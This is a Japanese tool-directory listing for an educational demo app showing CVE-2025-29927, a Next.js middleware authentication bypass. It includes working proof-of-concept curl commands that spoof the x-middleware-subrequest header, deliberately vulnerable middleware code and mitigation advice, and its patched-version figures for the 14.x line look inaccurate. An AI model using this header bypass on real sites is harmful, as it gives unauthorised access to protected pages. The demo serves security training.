Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-29927-nextjs — 教育デモ of CVE-2025-29927、Next.js ミドルウェアの重大な認証バイパス。脆弱な管理パネル、概念実証のエクスプロイトコマンド、セキュリティトレーニング向けの緩和ガイダンスを含みます。 | Kitploit
ツール/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証学習と教育
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

教育デモ of CVE-2025-29927、Next.js ミドルウェアの重大な認証バイパス。脆弱な管理パネル、概念実証のエクスプロイトコマンド、セキュリティトレーニング向けの緩和ガイダンスを含みます。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ヒマラヤテック管理パネル — CVE-2025-29927 デモ

警告: このアプリケーションは意図的に脆弱にしています。教育目的および許可されたセキュリティ研究目的にのみ使用してください。公開サーバーにデプロイしないでください。


このデモについて

このアプリは、Next.js のミドルウェアにおける重大な認証バイパス脆弱性 CVE-2025-29927 (CVSS 9.1) を実演します。架空の企業「Himalaya Tech Pvt. Ltd.」の現実的な企業管理パネルを模擬しており、バイパスの影響を視覚的にわかりやすく示しています。

表示されるすべての従業員記録、API キー、データベース認証情報、その他の「機密」データは 完全に架空のモックデータ であり、教育デモンストレーションのために生成されています。


CVE-2025-29927 — 脆弱性概要

フィールド詳細
CVE IDCVE-2025-29927
深刻度重大 (CVSS 9.1)
影響を受けるバージョンNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
修正バージョンNext.js 14.2.30, 15.2.3
種類HTTP ヘッダー操作によるミドルウェア認証バイパス

根本原因

Next.js は内部 HTTP ヘッダー x-middleware-subrequest を使用して、再帰的なミドルウェア呼び出しを追跡し、無限ループを防止します。脆弱なバージョンでは、攻撃者が外部リクエストに このヘッダーを偽装 することができます。ヘッダーが存在し、ミドルウェアの識別子と一致すると、Next.js ランタイムは ミドルウェア全体をスキップ し、その中で定義されたすべての認証ロジックもスキップされます。

影響

ルート保護を middleware.ts のみに依存するアプリケーション(一般的で推奨される Next.js のパターン)はすべて脆弱です。認証されていない攻撃者は、1 つの HTTP ヘッダーを追加するだけで、保護された任意のページにアクセスできます。


概念実証

通常のリクエスト(ブロック — /login にリダイレクト)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

バイパスリクエスト(成功 — 管理ページ全体が返る)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — 認証不要で管理ダッシュボードの HTML 全体が返る

ネストされた保護ルートへのアクセス

root@kitploit:~
# 管理ユーザーページ
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# 「本番環境認証情報」を含むシステム設定
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

ブラウザを使用する場合(Burp Suite / ブラウザ拡張機能経由)

/admin/* へのリクエストにリクエストヘッダー x-middleware-subrequest: middleware を追加すると、ミドルウェアチェックがスキップされます。


このアプリが脆弱な理由

middleware.ts が 唯一の 保護機構です:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← この関数全体がスキップされる
    }
  }
  return NextResponse.next();
}

ページコンポーネント自体(例:app/admin/page.tsx)には 認証チェックがありません — これは、ミドルウェアのみの保護パターンに従う実際のアプリケーションを模倣するための意図的な設計です。


セットアップと実行

前提条件

  • Node.js 18+
  • npm または yarn

インストール

root@kitploit:~
npm install

開発サーバーの実行

root@kitploit:~
npm run dev

アプリは http://localhost:3000 で利用可能になります。

ルート

*ミドルウェアのみで保護 — CVE-2025-29927 でバイパス可能。

デモ認証情報(通常のログインフロー)

  • メール: [email protected]
  • パスワード: Admin@2024

緩和策

  1. Next.js をアップグレード 14.2.30+ または 15.2.3+ に。
  2. 多層防御: ミドルウェアだけでなく、ページコンポーネントやルートハンドラー内にもサーバーサイドの認証チェックを追加する。ミドルウェアは UX の最適化として扱い、セキュリティ境界として扱わない。
  3. リバースプロキシ/CDN でヘッダーを除去 してからリクエストを Next.js に到達させる。

免責事項

このアプリケーションは 教育目的のみ のために提供されており、具体的には倫理的なセキュリティコースの文脈で CVE-2025-29927 の現実世界での影響を実演するためのものです。すべてのデータ(従業員記録、API キー、認証情報)は 完全に架空 です。このデモアプリケーションやここで実演された手法を、所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。

ツールをダウンロード
ルート認証必須説明
/いいえ公開ランディングページ
/loginいいえログインフォーム
/adminはい*機密データを含む管理ダッシュボード
/admin/usersはい*ユーザー管理
/admin/settingsはい*システム設定と認証情報